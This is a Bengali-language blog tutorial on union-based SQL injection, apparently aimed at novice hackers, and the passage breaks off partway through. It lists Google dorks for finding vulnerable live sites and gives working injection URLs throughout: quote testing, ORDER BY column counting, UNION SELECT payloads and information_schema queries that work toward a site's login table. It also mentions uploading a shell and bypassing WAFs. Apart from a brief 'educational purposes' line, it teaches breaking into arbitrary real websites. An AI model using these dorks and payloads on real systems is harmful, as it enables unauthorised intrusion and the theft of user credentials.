Web Site Hacking : Sql Injection (Union Based)

SQL INJECTION (Union Based SQLi)

āϏāĻŦাāχ āφāĻļা āĻ•āϰি āĻ­াāϞো āφāĻ›েāύ।
(āĻāχ āϟিāωāϟোāϰি⧟াāϞāϟি āĻļুāϧুāĻŽাāϤ্āϰ āĻļিāĻ•্āώāύী⧟ āωāĻĻ্āĻĻ্āϝেāĻļ্āϝে āϞেāĻ–া āĻšā§ŸেāĻ›ে)

āĻāĻ–āύ āĻĨেāĻ•ে āφāĻŽি SQL INJECTION āύি⧟ে āύি⧟āĻŽিāϤ āϟিāωāύ āϞেāĻ–াāϰ āϚেāώ্āϟা āĻ•āϰāĻŦো।
āφāϜāĻ•ে āφāĻŽি āφāĻĒāύাāĻĻেāϰ āϏাāĻĨে āĻŦেāϏিāĻ• āχāωāύি⧟āύ āĻŦেāϜāĻĄ SQL INJECTION
āĻ•িāĻ­াāĻŦে āĻ•āϰা āĻšā§Ÿ āϏেāϟা āĻĻেāĻ–াāĻŦো।
āĻāĻŦং āĻŦিāϏ্āϤাāϰিāϤ āφāϞোāϚāύা āĻ•āϰাāϰ āϚেāώ্āϟা āĻ•āϰāĻŦো āφāĻļা āĻ•āϰি āϧৈāϰ্āϝ āϏāĻšāĻ•াāϰে āĻĒ⧜āĻŦেāύ।

  • SQL INJECTION āĻ•ি?

SQL INJECTION  āĻšāϚ্āĻ›ে āĻŦāϰ্āϤāĻŽাāύ āϏāĻŽā§Ÿেāϰ āĻ“ā§ŸেāĻŦāϏাāχāϟ āĻš্āϝাāĻ•িং āϏāĻŦāϚে⧟ে āϜāύāĻĒ্āϰি⧟ āĻāĻŦং
āĻ•āĻŽāύ āĻŽেāĻĨāĻĄ/āĻĒāĻĻ্āϧāϤি।
āφāϏāϞে SQL INJECTION āĻšāϚ্āĻ›ে āϤেāĻŽāύ āĻ•āĻ িāύ āϜিāύিāϏ āύা āϤāĻŦে
āĻāϟা āĻ­াāϞোāĻ­াāĻŦে āĻļিāĻ–āϤে āĻšāϞে,
āĻāϟাāϰ āĻĒিāĻ›āύে āφāĻĒāύাāϰ āĻ…āύেāĻ• āϏāĻŽā§Ÿ āĻĻেāĻ“ā§Ÿা āϞাāĻ—āĻŦে।

āĻ•িāύ্āϤু āĻš্āϝাāĻ•িং āĻ āύāϤুāύ āĻāĻŽāύ  āĻ…āύেāĻ• Newbiee āĻš্āϝাāĻ•াāϰ āĻŽāύে āĻ•āϰে āϝে SQL INJECTION āĻ•োāύো āĻŦāĻĄ āĻŦ্āϝাāĻĒাāϰ āύাāĻš
āĻ•াāϰāĻŖ āϤাāϰা āĻ–ুāĻŦ āϏāĻšāϜেāχ āĻŦিāĻ­িāύ্āύ āϟুāϞāϏ(Havij,Sqlmap,Sqlninja) āχāϤ্āϝাāĻĻি āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰে SQL INJECTION  āĻ•āϰāϤে āĻĒাāϰে।
āĻ•িāύ্āϤু SQL INJECTION  āĻāĻŽāύ āĻāĻ•āϟা āϜিāύিāϏ āϝেāϟা āϏāĻŽ্āĻĒāϰ্āĻ•ে āφāĻĒāύাāϰ āϏāĻŽ্āĻĒূāϰ্āĻŖ āĻļিāĻ–āϤে āĻšāϞে āĻ…āύেāĻ• āĻŦāχ āĻļেāώ āĻ•āϰা āϞাāĻ—āĻŦে :)
āĻāϰ āĻŽাāύে āĻŦোāĻা āĻ—েāϞো āϝে āĻļুāϧুāĻŽাāϤ্āϰ āϟুāϞāϏ āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰে āφāĻĒāύি āĻ…āύেāĻ• āϏাāχāϟ āĻ•িāύ্āϤু SQL INJECTION āĻ•āϰāϤে āĻĒাāϰāĻŦেāύ।
āĻ•িāύ্āϤু āϤাāϰ āĻĻ্āĻŦাāϰা āφāϏāϞেāχ āĻ•োāύো āϞাāĻ­ āĻšāĻŦে āύা।
āĻ•াāϰāĻŖ āφāĻĒāύি āĻ•িāĻ›ুāχ āĻļিāĻ–āϤে āĻĒাāϰāĻŦেāύ āύা।
āĻāĻŦং āĻ…āύেāĻ• āϏāĻŽā§Ÿ āϟুāϞāϏ āĻĻি⧟েāĻ“ SQL INJECTION āĻāϰ āϜāύ্āϝে āĻĻুāϰ্āĻŦāϞ/āĻ­ুāϞāύাāϰেāĻŦāϞ āϏাāχāϟ āĻš্āϝাāĻ• āĻ•āϰāϤে āĻĒাāϰāĻŦেāύ āύা।
āϝা⧟ āĻšোāĻ•।

  • SQL INJECTION āĻĻ্āĻŦাāϰা āĻ•ি āĻ•ি āĻ•āϰāϤে āĻĒাāϰāĻŦেāύ āφāĻĒāύি?
  1. āφāĻĒāύি āĻĄাāϟাāĻŦেāϏে āϤāĻĨ্āϝ āϤে āĻāĻ•্āϏেāϏ āύিāϤে āĻĒাāϰāĻŦেāύ।
  2. āφāĻĒāύি āĻĄাāϟাāĻŦেāϏেāϰ āϤāĻĨ্āϝ āĻŽোāĻĄিāĻĢাāχ āĻ•āϰāϤে āĻĒাāϰāĻŦেāύ।
  3. āφāĻĒāύি āϏাāχāϟেāϰ āϞāĻ—āχāύ āĻāϰি⧟া āĻŦাāχāĻĒাāϏ āĻ•āϰāϤে āĻĒাāϰāĻŦেāύ।
  4. āφāĻĒāύি SQL Server āĻš্āϝাāĻ• āĻ•āϰāϤে āĻĒাāϰāĻŦেāύ।

āϤাāĻšāϞে āĻļুāϰু āĻ•āϰা āϝাāĻ•।

āĻĒ্āϰāĻĨāĻŽāϤ āφāĻŽাāĻĻেāϰ SQL INJECTION āĻāϰ āϜāύ্āϝে āĻ­ুāϞāύাāϰāĻŦāϞ āϏাāχāϟ āĻŦেāϰ āĻ•āϰāϤে āĻšāĻŦে।
āϝāĻĻি āφāĻĒāύি āĻš্āϝাāĻ•াāϰ āĻšāύ,āϤাāĻšāϞে āφāĻĒāύি āĻ­াāϞো āĻ•āϰেāχ āϜাāύāĻŦেāύ āϝে āϏাāϰ্āϚ āχāĻž্āϜিāύ āĻšāϞো āĻš্āϝাāĻ•াāϰāĻĻেāϰ
āϏāĻŦāϚে⧟ে āĻŦেāϏ্āϟ āĻĢ্āϰেāύ্āĻĄ।āφāĻŽāϰা SQL INJECTION āĻ­ুāϞāύাāϰāĻŦāϞ āϏাāχāϟ GOOGLE Dork
āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰে āĻŦেāϰ āĻ•āϰāϤে āĻĒাāϰāĻŦো।
āύিāϚে āφāĻŽি āĻ•িāĻ›ু āĻ•āĻŽāύ SQL INJECTION Dork āĻĻিāϚ্āĻ›িঃ

inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=

Dork āφāϰো āĻ…āύেāĻ• āĻŦāĻĄ āĻŦিāĻļাāϞ āϞিāϏ্āϟ āφāĻ›ে। āĻĒāϰে āĻ•োāύো āĻāĻ• āϏāĻŽā§Ÿ āĻļে⧟াāϰ āĻ•āϰāĻŦো।
āĻ…āĻĨāĻŦা āφāĻĒāύি āĻ—ুāĻ—āϞ āĻĨেāĻ•ে āϏাāϰ্āϚ āĻ•āϰে āĻŦেāϰ āĻ•āϰে āύিāϤে āĻĒাāϰেāύ।

āĻāĻ–āύ āφāĻĒāύি āĻāĻ–াāύ āĻĨেāĻ•ে āϝেāĻ•োāύো āĻāĻ•āϟি Dork āύি⧟ে āĻ—ুāĻ—āϞে āϏাāϰ্āϚ āĻĻিāϞে
āϰেāϏাāϞ্āϟে āĻ…āύেāĻ• āϏাāχāϟ āĻĻেāĻ–āϤে āĻĒাāĻŦেāύ।
āϏেāĻ–াāύ āĻĨেāĻ•ে āϝেāĻ•োāύো āĻāĻ•āϟি āϏাāχāϟে āĻĒ্āϰāĻŦেāĻļ āĻ•āϰুāύ।

āĻŽāύে āĻ•āϰুāύ āĻāϰāĻ•āĻŽ āĻāĻ•āϟি āϏাāχāϟ āĻĒেāϞেāύ āφāĻĒāύি (āωāĻĻাāĻšাāϰāĻŖ)
website.com/index.php?id=1

āĻāχ āχāωāφāϰāĻāϞ āϟি āĻ…āύেāĻ• āϰāĻ•āĻŽেāϰ āĻšāϤে āĻĒাāϰে। āϤāĻŦে āφāĻŽি āωāĻĻাāĻšাāϰāĻŖেāϰ āϜāύ্āϝে āĻāϟি āĻĻেāĻ–াāϞাāĻŽ।
āĻāĻ–āύ āφāĻŽāϰা āϟেāϏ্āϟ āĻ•āϰāĻŦো āϏাāχāϟāϟি SQL INJECTION āĻ­ুāϞāύāϰাāĻŦāϞ āĻ•িāύা।
āϤাāϰ āϜāύ্āϝে āφāĻŽি āϏাāχāϟেāϰ āĻļেāώে āĻāχ (') āϚিāĻš্āύāϟি āĻĻিāĻŦো (āĻŦ্āϰাāĻ•েāϟেāϰ āĻŽাāĻāĻ–াāύেāϰ āϚিāĻš্āύāϟি)
āωāĻĻাāĻšাāϰāĻŖঃ
website.com/index.php?id=1'

āĻāĻ–āύ āϝāĻĻি āϏাāχāϟি SQL INJECTION āĻāϰ āϜāύ্āϝে āĻ­ুāϞāύাāϰāĻŦāϞ āĻšā§Ÿ āϤাāĻšāϞে
āφāĻĒāύি āĻāϰāĻ•āĻŽ āĻ•িāĻ›ু āĻāϰāϰ āĻĻেāĻ–āϤে āĻĒাāĻŦেāύ।
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 1
āĻ…āĻĨāĻŦা,
Warning: mysql_fetch_array()
āĻ…āĻĨāĻŦা āφāĻĒāύি āϝāĻĻি āĻ•োāύো āϰāĻ•āĻŽেāϰ mysql āĻāϰāϰ āĻĻেāĻ–āϤে āĻĒাāύ।
āĻ…āĻĨāĻŦা āϝāĻĻি āϏেāχ āĻ“ā§ŸেāĻŦ āĻĒেāχāϜ āĻĨেāĻ•ে āĻ•োāύো āĻĄাāϟা āĻŽিāϏ āĻ•āϰে āϤাāĻšāϞে āĻŦুāĻāϤে āĻšāĻŦে
āϏাāχāϟāϟি SQL INJECTION āĻ­ুāϞāύāϰাāĻŦāϞ।

āϝāĻĻি āĻāϏāĻŦেāϰ āĻ•িāĻ›ু āύা āĻšā§Ÿ āϤাāĻšāϞে āϏাāχāϟāϟি āĻ­ুāϞāύাāϰāĻŦāϞ āύাāĻš!
āĻ…āύ্āϝ āφāϰেāĻ•āϟি āϏাāχāϟ āĻ–ুāϜুāύ।

āĻāϰāϰ āĻĒাāĻ“ā§Ÿাāϰ āĻĒāϰে āĻāĻ–āύ āφāĻŽাāĻĻেāϰ āĻ•াāϜ āĻšāĻŦে āϏাāχāϟāϟি āĻ•ি āĻāĻ•্āϏāĻĒ্āϞāχāϟিং āĻ•āϰাāϰ ।
āĻŽাāύে SQL INJECTION āĻ•āϰāϤে āĻšāĻŦে।

āφāĻŽāϰা āĻāϤāĻ•্āώāύ āĻ­ুāϞāύাāϰāĻŦāϞ āϏাāχāϟ āĻŦেāϰ āĻ•āϰāϞাāĻŽ,āĻāĻ–āύ āφāĻŽাāĻĻেāϰ āĻ•াāϜ āĻšāĻŦে āϏাāχāϟāϟি āĻĨেāĻ•ে āĻĄাāϟা
āĻĄাāĻŽ্āĻĒ āĻ•āϰা āĻŦা āĻš্āϝাāĻ• āĻ•āϰা।
āĻāĻ–āύ āφāĻŽাāĻĻেāϰ āĻĒāϰāĻŦāϰ্āϤী āĻĒāĻĻāĻ•্āώেāĻĒ āĻšāĻŦে āĻāχ āĻĄাāϟাāĻŦেāϏেāϰ āϟেāĻŦিāϞে āĻ•āϞাāĻŽেāϰ āϏংāĻ–্āϝা āĻ•āϤো āϏেāϟা āĻŦেāϰ āĻ•āϰা।
āϏেāϜāύ্āϝে āφāĻŽāϰা ' āϚিāĻš্āύ āϟি order by statement āĻ āĻĒāϰিāĻŦāϰ্āϤāύ āĻ•āϰāĻŦো।
āωāĻĻাāĻšাāϰāĻŖঃ
website.com/index.php?id=1 order by 1--
website.com/index.php?id=1 order by 2--
website.com/index.php?id=1 order by 3--
website.com/index.php?id=1 order by 4--

āφāĻŽাāĻĻেāϰ order by āĻāϰ āύাāĻŽ্āĻŦাāϰ āϟি āĻŦাāĻĄি⧟ে āϝেāϤে āĻšāĻŦে āϝāϤāĻ•্āώāύ āύা āφāĻŽāϰা
āϏাāχāϟāϟি āϤে āĻ•োāύো āĻāϰāϰ āĻĻেāĻ–āϤে āύা āĻĒা⧟।
āĻāϰāϰ āĻ…āύেāĻ•āϟা āĻāϰāĻ•āĻŽ āĻšāϤে āĻĒাāϰে,
unknown column numbers
āĻ…āĻĨāĻŦা
āϏাāχāϟেāϰ āĻ•িāĻ›ু āĻĄাāϟা āĻŽিāϏ āĻšāϤে āĻĒাāϰে।
āωāĻĻাāĻšাāϰāĻŖঃ
http://www.exaplme.sqlsite.com/page.php?id=20 order by 1-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 2-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 3-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 10-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 20-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 21-- ERROR āϏাāχāϟেāϰ āĻ•āύāϟেāύ্āϟ āĻŽিāϏ āĻšāϚ্āĻ›ে।
āĻāĻ–āύ āφāĻŽাāϰা order by 21 āĻĒāϰ্āϝāύ্āϤ āφāϏাāϰ āĻĒāϰ error āĻĻেāĻ–āϤে āĻĒেāϞাāĻŽ।
āĻ•িāύ্āϤু order by 20 āĻĻিāϞে āĻ•োāύো āĻāϰāϰ āύেāχ।
āϤাāϰ āĻŽাāύে āĻĄাāϟাāĻŦেāϏে ⧍ā§Ļ āϟি āĻ•āϞাāĻŽ āφāĻ›ে।
āĻ…āύেāĻ• āϏāĻŽā§Ÿ order by 1000 āĻĻিāϞেāĻ“ āĻāϰāϰ āφāϏে āύাāĻš।
āϏে āĻ•্āώেāϤ্āϰে id / parameter āĻāϰ āĻļেāώে ' āϚিāĻš্āύ āϟি āĻĻিāϤে āĻšā§Ÿ
āĻāĻŦং āĻļেāώে āĻāĻ•āϟি + āϝোāĻ— āĻ•āϰāϤে āĻšā§Ÿ।
āωāĻĻাāĻšাāϰāĻŖঃ
http://www.exaplme.sqlsite.com/page.php?id=20' order by 21--+
āĻāĻ–āύ āφāĻŽাāĻĻেāϰ āϜাāύা āφāĻ›ে āϝে āĻāχ āĻĄাāϟাāĻŦেāϏে ⧍ā§Ļāϟি āĻ•āϞাāĻŽ āφāĻ›ে।
āĻāĻ–āύ āφāĻŽাāĻĻেāϰ āĻ•াāϜ āĻšāĻŦে āϏāĻŦ āĻ•āϞাāĻŽ āϏিāϞেāĻ•্āϟ āĻ•āϰা union select statement āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰে।
select statement āϟি Data āĻĻেāĻ–াāϰ āϜāύ্āϝে āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰা āĻšā§Ÿ।

āϝা⧟ āĻšোāĻ• āĻāϰ āĻĒāϰ্āϝা⧟ে āφāĻŽāϰা āĻāχ āĻ•োāĻĄāϟি āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰāĻŦো।
http://www.exaplme.sqlsite.com/page.php?id=20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

āĻāĻ–āύ āφāĻŽāϰা āĻ“ā§ŸেāĻŦ āĻĒেāχāϜে āĻ•িāĻ›ু āύাāĻŽ্āĻŦাāϰ āĻĻেāĻ–āϤে āĻĒাāĻŦো।
āύāĻŽ্āĻŦāϰ āĻ—ুāϞো ā§§-⧍ā§Ļ āĻāϰ āĻŽāϧ্āϝে āĻšāĻŦে āĻ•াāϰāĻŖ āφāĻŽāϰা āϜাāύি āĻāχ āϏাāχāϟেāϰ āĻ•āϞাāĻŽ ⧍ā§Ļ āϟি।
āφāϰ āφāĻŽāϰা āϝে āĻ•āĻŽাāύ্āĻĄāϟি āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰেāĻ›ি āϏেāϟা āĻĻি⧟ে ⧍ā§Ļāϟি āĻ•āϞাāĻŽেāϰ āĻŽāϧ্āϝে āĻ•োāύāϟি
String āĻ•āϞাāĻŽ āϏেāϟা āĻŦেāϰ āĻ•āϰাāϰ āϜāύ্āϝে āĻāχ āĻ•āĻŽাāύ্āĻĄ āϟি āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰেāĻ›ি।
āϝāĻĻি āφāĻĒāύি āĻ•োāύো āύাāĻŽ্āĻŦাāϰ āĻĻেāĻ–āϤে āύা āĻĒাāύ āϤাāĻšāϞে
parameter value āĻāϰ āφāĻ—ে āĻāĻ•āϟি - āϚিāĻš্āύ āĻĻেāύ।
āωāĻĻাāĻšাāϰāĻŖঃ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

āφāĻĒāύি āĻ“ā§ŸেāĻŦāĻĒেāχāϜে āĻ•িāĻ›ু āύাāĻŽ্āĻŦাāϰ āĻĻেāĻ–āϤে āĻĒাāĻŦেāύ।
āφāĻŽি ā§Š,ā§Ē āĻĻেāĻ–āϤে āĻĒেāϞাāĻŽ।
āĻāχ āĻĻুāχāϟা āĻšāϞো String Column āφāĻŽāϰা āĻĄাāϟাāĻŦেāϏ āĻĨেāĻ•ে āϤāĻĨ্āϝ āĻš্āϝাāĻ• āĻ•āϰāϤে āĻĒাāϰāĻŦো
āĻāχ āĻĻুāχāϟি āĻ•āϞাāĻŽ āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰে।
āĻ…āύেāĻ• āϏāĻŽā§Ÿ āωāĻĒāϰে āϝে āĻ•āĻŽাāύ্āĻĄāϟি āύি⧟ে āϞেāĻ–েāĻ›ি āϏেāϟা āĻ•াāϜ āĻ•āϰে āύাāĻš :(
āϏে āĻ•্āώেāϤ্āϰে āφāĻŽāϰা āĻāϰāϰ āĻĻেāĻ–āϤে āĻĒাāĻŦো।
āĻāχ āĻ•্āώেāϤ্āϰে waf bypass āĻ•āϰāϤে āĻšāĻŦে।
āϏেāϟা āϏāĻŽ্āĻĒāϰ্āĻ•ে āϏাāĻŽāύেāϰ āϟিāωāϟোāϰি⧟াāϞ āĻ—ুāϞোāϤে āφāϞোāϚāύা āĻ•āϰāĻŦো।

āĻāĻ–āύ āφāĻŽাāĻĻেāϰ āĻ•াāϜ āĻĄাāϟাāĻŦেāϏ āĻĨেāĻ•ে āĻĄাāϟা āĻš্āϝাāĻ• āĻ•āϰা।
āφāĻŽāϰা āĻāĻ–āύ āĻĄাāϟাāĻŦেāϏেāϰ āϏংāϰāĻ•্āώিāϤ āĻ—োāĻĒāύ āĻĄাāϟা āĻ—ুāϞো āĻš্āϝাāĻ• āĻ•āϰāϤে āĻĒাāϰāĻŦো।
āĻāĻ›াāĻĄাāĻ“ āφāĻŽāϰা āĻĄাāϟাāĻŦেāϏেāϰ āύাāĻŽ database() āĻāχ āĻ•āĻŽাāύ্āĻĄ āϟি āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰে,
āĻĄাāϟাāĻŦেāϏ āĻ­াāϰ্āϏāύ āϜাāύāϤে  version() āĻāχ āĻ•āĻŽাāύ্āĻĄāϟি āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰে āĻŦেāϰ āĻ•āϰāϤে āĻĒাāϰāĻŦো।
āĻāĻ›াāĻĄাāĻ“ āφāĻŽāϰা SQL INJECTION āĻāϰ āĻŽাāϧ্āϝāĻŽে āϞোāĻĄ āĻĢাāχāϞ āĻŽেāĻĨāĻĄ āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰে
āĻ­ুāϞāύāϰাāĻŦāϞ āϏাāχāϟে āĻļেāϞ āφāĻĒāϞোāĻĄ āĻĻিāϤে āĻĒাāϰāĻŦো (āĻāχ āĻŦিāώ⧟ে āĻĒāϰে āϟিāωāϟোāϰি⧟াāϞ āϞেāĻ–া āĻšāĻŦে)

āĻāχ āϟিāωāϟোāϰি⧟াāϞ āϟি āϤে āφāĻŽāϰা āĻĄাāϟাāĻŦেāϏ āχāωāϜাāϰ āύেāĻŽ āĻāĻŦং āĻĄাāϟাāĻŦেāϏ āĻ­াāϰ্āϏāύ āĻŦেāϰ āĻ•āϰāĻŦো,
ā§Š āĻāĻŦং ā§Ē āύāĻŽ্āĻŦāϰ String āĻ•āϞাāĻŽ āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰে।

āωāĻĻাāĻšাāϰāĻŖঃ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,version(),group_concat(database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

āφāĻŽি āĻāĻ–াāύে 0x3a āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰেāĻ›ি āĻāϟা āĻšāϞো āϏেāĻŽিāĻ•োāϞāύ (;) āĻāϰ āĻšেāĻ•্āϏ āĻ­্āϝাāϞু
āĻāϟা āĻĻুāχāϟা āĻĄিāĻĢাāϰেāύ্āϟ āĻ­্āϝাāϞু āĻ•ে āĻĄিāĻĢাāϰেāύ্āϟ āĻĒ্āϝাāϰাāĻŽিāϟাāϰ āĻ āϏেāĻĒাāϰেāϟ āĻ•āϰে āĻĻেāĻ–াāĻŦে।
āĻāĻ–āύ āĻĻেāĻ–া āϝাāĻŦে āϝে ā§Š āĻāϰ ā§Ē āύāĻŽ্āĻŦāϰ āĻ­ুāϞāύাāϰāĻŦāϞ āϏাāχāϟেāϰ āϜা⧟āĻ—া⧟ āĻĄাāϟাāĻŦেāϏ āĻ­াāϰ্āϏāύ āĻāĻŦং
āĻĄাāϟাāĻŦেāϏেāϰ āχāωāϜাāϰেāϰ āύাāĻŽ āĻĻেāĻ–াāĻŦে।
āĻāĻ–āύ āφāĻŽāϰা āĻ­ুāϞāύাāϰāĻŦāϞ āϏাāχāϟেāϰ āϝে āϝে āĻĄাāϟাāĻŦেāϏ āϏেāϟা āĻŦেāϰ āĻ•āϰāĻŦো।
āϤাāϰ āϜāύ্āϝে āφāĻŽাāĻĻেāϰ āĻ•āϞাāĻŽ āύেāĻŽেāϰ āϜা⧟āĻ—া⧟ SQL QUERY āĻĻি⧟ে āϰিāĻĒ্āϞেāϏ āĻ•āϰāϤে āĻšāĻŦে।
āωāĻĻাāĻšাāϰāĻŖঃ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.schemata--

āĻāĻ–āύ āφāĻŽāϰা āĻĻুāχāϟা āĻĄাāϟাāĻŦেāϏ āĻĻেāĻ–āϤে āĻĒাāĻŦো
āĻāĻ•āϟি information_schema āφāϰেāĻ•āϟি site_database āĻāϟা āϏাāχāϟ āĻāĻĄāĻŽিāύ āϝে āύাāĻŽে āĻĻি⧟েāĻ›ে āϏে āύাāĻŽে āĻšāĻŦে
āĻāĻ–āύ information_schema āύি⧟ে āφāĻŽাāĻĻেāϰ āĻ•োāύো āĻ•াāϜ āύেāχ āĻ•াāϰāĻŖ
āĻ•াāϰāĻŖ information_schema āϤে āϏিāϏ্āϟেāĻŽ āϟেāĻŦিāϞ āĻĨাāĻ•ে āϝা āĻĄাāϟাāĻŦেāϏ āĻ•ে āĻĄিāĻĢাāχāύ āĻ•āϰে।
āφāĻŽāϰা āĻāχ āϟেāĻŦিāϞ āĻ—ুāϞো āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰে āĻĄাāϟাāĻŦেāϏেāϰ āϞে-āφāωāϟ āϏ্āϟাāχāϞ āϚেāĻ• āĻ•āϰāϤে āĻĒাāϰāĻŦো।
āϝা⧟ āĻšোāĻ• āĻāχāĻ—ুāϞা āĻ…āύেāĻ• āĻāĻĄāĻ­াāύ্āϏ āϞেāĻ­েāϞেāϰ āĻ•āĻĨা āĻŦাāϰ্āϤা āϞোāϞ :p
āϝা āĻāĻ–āύ āφāĻĒāύাāϰা āĻŦুāĻāϤে āĻĒাāϰāĻŦেāύ āύা।
āĻāĻ–āύ āφāĻŽাāĻĻেāϰ āĻ•াāĻ›ে āĻĄাāϟাāĻŦেāϏ āφāĻ›ে (āφāϏāϞে āφāĻŽাāĻĻেāϰ āĻĄাāϟাāĻŦেāϏেāϰ āύাāĻŽ āϚেāĻ• āĻ•āϰাāϰ āĻĻāϰāĻ•াāϰ āĻ›িāϞো āύা
āφāĻŽি āĻļুāϧু āĻļেāĻ–াāϰ āωāĻĻ্āĻĻেāĻļ্āϝে āϏেāχ āĻŦিāώ⧟ে āĻŦāϞāϞাāĻŽ।āφāĻŽāϰা āϝāĻĻি āϏাāχāϟেāϰ āĻĄাāϟাāĻŦেāϏ āĻĨেāĻ•ে āĻĄাāϟা āĻš্āϝাāĻ• āĻ•āϰāϤে āϚা⧟
āϤাāĻšāϞে āφāĻŽāϰা āĻĄাāϟাāĻŦেāϏ āĻĢাংāĻļāύ āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰেāχ āĻĄাāϟা āĻĄাāĻŽ্āĻĒ āĻ•āϰāϤে āĻĒাāϰি।
āϏে āĻ•্āώেāϤ্āϰে site_database āĻāϰ āύাāĻŽ āϜাāύাāϰ āφāϰ āĻĻāϰāĻ•াāϰ āĻšāĻŦে āύা।
āφāĻŽāϰা āĻāχ āϟিāωāϟোāϰি⧟াāϞে database() āĻāχ āĻĢাংāĻļāύ āϟি āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰে āĻĄাāϟা āĻš্āϝাāĻ• āĻ•āϰāĻŦো।)

āĻāĻ–āύ āφāĻŽāϰা āĻĄাāϟাāĻŦেāϏ āĻĨেāĻ•ে āϟেāĻŦিāϞāϏ āĻŦেāϰ āĻ•āϰāĻŦো।
āĻāĻ–āύ āφāĻŽāϰা where āĻ•āύ্āĻĄিāĻļāύ āϟি āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰāĻŦো āĻāχ query āϤে।
āφāĻŽāϰা āϟেāĻŦিāϞāϏ āύেāĻŽ āĻŦেāϰ āĻ•āϰāĻŦো select statement āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰে
āĻāĻŦং where āĻ•āύ্āĻĄিāĻļāύāϟি āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰāĻŦো āĻāϟা āĻĻেāĻ–াāύোāϰ āϜāύ্āϝে āĻ•োāύ āĻĄাāϟাāĻŦেāϏ āĻĨেāĻ•ে āφāĻŽāϰা āϟেāĻŦিāϞāϏ
āĻŦেāϰ āĻ•āϰāϤে āϚাāϚ্āĻ›ি।
āωāĻĻাāĻšাāϰāĻŖঃ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--

āĻāĻ–āύ āφāĻĒāύি āϟেāĻŦিāϞāϏ āĻĻেāĻ–āϤে āĻĒাāĻŦেāύ।
āĻŽāύে āĻ•āϰেāύ āĻāχ āϟেāĻŦিāϞāϏ āĻ—ুāϞা āφāĻŽāϰা āĻĒেāϞাāĻŽ।

  • archive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint,tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animation,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,tbl_tnc,tender,tender2,tender3,tender_drawing,unit

āĻāĻ–āύ āφāĻŽাāĻĻেāϰ āĻĻেāĻ–āϤে āĻšāĻŦে āĻāχ āĻ—ুāϞোāϰ āĻŽāϧ্āϝে āϏেāύāϏেāϟিāĻ­ āϟেāĻŦিāϞ āĻ•োāύāϟা āϝেāĻ–াāύে āĻ—ুāϰুāϤ্āĻŦāĻĒূāϰ্āĻŖ āĻĄাāϟা āĻĨাāĻ•āĻŦে ?

āϏেāϟা āĻšāϚ্āĻ›ে login āϟেāĻŦিāϞ।

āĻāĻ• āĻāĻ• āĻ•্āώেāϤ্āϰে āĻāĻ• āĻāĻ• āϰāĻ•āĻŽ āĻšāϤে āĻĒাāϰে āϟেāĻŦিāϞ āύেāĻŽ। āύিāϜেāϰ āĻŦুāĻĻ্āϧি āĻ–াāϟাāύ!

āφāĻŽāϰা āĻāĻ–āύ login āϟেāĻŦিāϞ āĻĨেāĻ•ে āĻĄাāϟা āĻš্āϝাāĻ• āĻ•āϰāĻŦো ।
āĻāĻ–āύ āφāĻŽāϰা group_concat(table_name) āĻ•ে group_concat(column_name) āĻāĻŦং information_schema.tables āĻ•ে information_schema.columns
āĻĻি⧟ে āϰিāĻĒ্āϞেāϏ āĻ•āϰāĻŦো āĻāĻŦং table_schema āĻāϰ āϜা⧟āĻ—া⧟ table_name āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰāĻŦো।
āĻāĻ–āύ āφāĻŽাāϰা table_name āĻ•ে āĻāĻ•āϟি āĻĒ্āϝাāϰাāĻŽিāϟাāϰ āĻĻিāĻŦো āϟেāĻŦāϞ āύেāĻŽ āϟি quote āĻ āύি⧟ে āφāϏāĻŦো
table_name='login'
āφāĻŽāϰা qoute āĻ•েāύো āĻŦ্āϝাāĻŦāĻšাāϰ āĻ•āϰāϞাāĻŽ??
āĻ•াāϰāĻŖ āĻāϟাāϰ āĻĄাāϟা āϟাāχāĻĒ varchar...
āĻ…āύেāĻ• āϏāĻŽā§Ÿ āĻāχ āĻĒāĻĻ্āϧāϤি āϟি āĻ•াāϜ āĻ•āϰে āύাāĻš...
